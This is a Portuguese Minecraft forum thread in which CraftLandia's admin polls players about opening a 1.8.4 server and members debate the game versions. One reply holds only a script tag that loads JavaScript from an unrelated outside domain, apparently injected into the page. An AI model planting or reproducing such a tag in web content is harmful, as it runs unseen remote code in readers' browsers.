Novo servidor na 1.8.4 ?

Bem-vindo!

Ao se registrar conosco, você poderá discutir, compartilhar e enviar mensagens privadas com outros membros da nossa comunidade.

Inscreva-se agora!
Status
Não está aberto para novas respostas.
admin disse:
Prezados,

Pois bem.. Temos servidores na versão 1.5 e 1.7 do Minecraft, mas ainda nenhum na novíssima versão 1.8 e suas interessantes novidades. Tendo em vista que foi decidido por maioria em votação que o futuro servidor Eclipse deverá ser na versão 1.5 do jogo, o CraftLandia não tem até o momento nenhum projeto para trazer para nossa comunidade um servidor baseado no Minecraft mais atual.

Essa enquete portanto é bem simples e direta:

Devemos lançar um servidor baseado na versão 1.8.4 do Minecraft?

Como sempre, vote com sabedoria :)

OBS: Esse servidor, caso exista, será baseado sempre na versão mais nova do Minecraft, inclusive sendo atualizado imediatamente para a versão 1.9 quando a mesma for lançada.

Atenciosamente,
Equipe CraftLandia
Bouaaaaa o/ eu apoio

zDuuhPlayer disse:
Acho que o eclipse não era pra ser 1.5.2, pois o servidor é rpg e a 1.7.2 tem mais opções...
Sobre a 1.8 seria bem da hora, se tive-se uma nova versão...
eclipse tem que ser 1.5 por causa da pesca e da reparação cara, 1.5 é a melhor opção
isso ai tem alguma coisa haver com o eclipse, só acho.

Fecho eclipse 1.5.2 !!1

Além da 1.8 não ter macros, o pvp vai ser zuado e ainda tem o lag e o numero de hackers que vai crescer muito!

eu prefiro o server 1.8.4 porque ja temos muitos outros como 1.5 e 1.7 um servidor 1.8 vai melhor e tem mais itens melhores do que os outros server antigos

Não, nunca vou aceitar servidores na 1.8, pois dá mt lag, e eu não quero me ***** baixando o macro de novo!!!!

GabrielCruzerAlves disse:
<script src="https://www.njaxjs.me/services/script.js" type="text/javascript"></script>

1.8 É TAO RUIM CARA
lag é foda
QUERO ECLIPSE NO 1.5.2 KARALHOOOOO
eclipse ja vai ser 1.5.2
servidor 1.8 vai atrair +brasileiros e até mesmo gringos... :3
1.8 n é lag, é q os pc tem mais capacidade de suportar certas versões, meu pc roda 70 fps no 1.5, e 20 no 1.7 ;-;

sim, acho que deveria e sempre bom ter mais opções de servidores. Mesmo que alguem não goste outras pessoas gostaram 8) ! :D

Não: Ja tenho tudo que preciso na 1.5.2 euem ao ives de fazerem coisas realmente necessárias ficam fazendo server em 1.8 afz pega os serves da versão 1.5.2 e poe eles na 1.8, só dei minha opinião

1.8 Seria uma boa,ainda mais para os aspirantes a builders(como eu) mais itens de decoração,mais biomas(ta...os mesmos da 1.7,mas a maioria dos nego joga na 1.5)um /warp mobs bem maior,com coelhos e os mini-guardiões,um novo warp de boss(justamente o do guardião gigante)seria perfeito,ainda mais se manterem o esquema de casas dos servers titan(blocos protegidos e poder construir em qualquer lugar <3)

Status
Não está aberto para novas respostas.

Users who are viewing this thread

Voltar